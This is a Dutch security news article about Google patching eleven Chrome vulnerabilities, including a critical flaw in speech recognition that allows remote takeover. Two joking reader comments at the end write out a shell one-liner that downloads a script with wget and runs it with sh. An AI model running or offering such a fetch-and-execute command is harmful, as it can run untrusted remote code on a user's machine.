image

Google dicht kritiek lek in spraakherkenning Chrome

vrijdag 17 januari 2020, 10:05 door Redactie, 2 reacties

Google heeft een nieuwe versie van Chrome uitgebracht die in totaal elf beveiligingslekken verhelpt, waaronder een kritieke kwetsbaarheid in de spraakherkenningsfunctie van de browser. Via dit lek is het mogelijk om systemen van Chrome-gebruikers in het ergste geval volledig over te nemen.

Google heeft de kwetsbaarheid als kritiek bestempeld. Een aanvaller kan via dergelijke beveiligingslekken code op het systeem van gebruikers uitvoeren. Alleen het bezoeken van een kwaadaardige of gecompromitteerde website of het te zien krijgen van een besmette advertentie is voldoende. Er is geen verdere interactie vereist. Vorig jaar werden er in totaal drie kritieke kwetsbaarheden door externe onderzoekers in Chrome gevonden en aan Google gerapporteerd. Het jaar daarvoor waren het er vier.

In het geval van dergelijke beveiligingslekken probeert Google de beschikbare update binnen dertig dagen onder alle Chrome-gebruikers uit te rollen. Details over het lek worden pas na zestig dagen openbaar gemaakt. De kwetsbaarheid werd op 28 oktober 2019 door onderzoekers Antti Levomaki en Christian Jalio van securitybedrijf Forcepoint aan Google gerapporteerd. Welke beloning de onderzoekers voor hun melding krijgen is nog niet bekend.

Tevens heeft Google aan de nieuwste versie van Chrome beveiligingsmaatregelen toegevoegd die gebruikers moeten beschermen tegen het crypto-lek in Windows waarvoor deze week een patch van Microsoft verscheen. Via de kwetsbaarheid zijn man-in-the-middle-aanvallen uit te voeren en is het mogelijk om malware van een legitiem lijkende digitale handtekening te voorzien.

De overige verholpen kwetsbaarheden maakten het mogelijk om code binnen de context van de browser uit te voeren. Het is dan mogelijk om bijvoorbeeld data van andere websites te lezen of aan te passen. Ook kwetsbaarheden om uit de Chrome-sandbox te ontsnappen vallen hieronder. Updaten naar de Chrome 79.0.3945.130 zal op de meeste systemen automatisch gebeuren.

Reacties (2)
17-01-2020, 11:23 door Anoniem
Als je zegt: "We get things and shags." wordt het commando "wget th.in/g.s || sh g.s" uitgevoerd.
20-01-2020, 11:06 door Anoniem
"We get things and shags." -> "wget th.in/g.s || sh g.s" uitgevoerd.
Raar, iedereen die ik ken spreekt dat uit als "dobbel juu ket & etc." ...?
Wellicht omdat ik weinig Nederlanders om mij heen heb.
Reageren

Deze posting is gelocked. Reageren is niet meer mogelijk.